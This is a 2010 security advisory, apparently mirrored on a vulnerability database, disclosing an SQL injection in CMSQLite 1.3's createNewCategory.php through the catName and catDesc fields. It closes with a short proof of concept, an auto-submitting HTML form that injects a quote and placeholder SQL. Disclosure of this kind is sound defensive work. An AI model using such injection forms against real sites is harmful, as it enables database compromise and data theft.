Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24218
HistoryJul 15, 2010 - 12:00 a.m.

SQL injection vulnerability in CMSQLite

2010-07-1500:00:00
vulners.com
11

Vulnerability ID: HTB22463
Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_cmsqlite_2.html
Product: CMSQLite
Vendor: CMSQLite-Team
Vulnerable Version: 1.3 and Probably Prior Versions
Vendor Notification: 29 June 2010
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/admin/helper/createNewCategory.php" script to properly sanitize user-supplied input in "catName" or "catDesc" variables. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/helper/createNewCategory.php&quot; method="post" name="main" >
<input type="hidden" name="catName" value="catName'some sql" />
<input type="hidden" name="catDesc" value="catDesc'some sql" />
</form>
<script>
document.main.submit();
</script>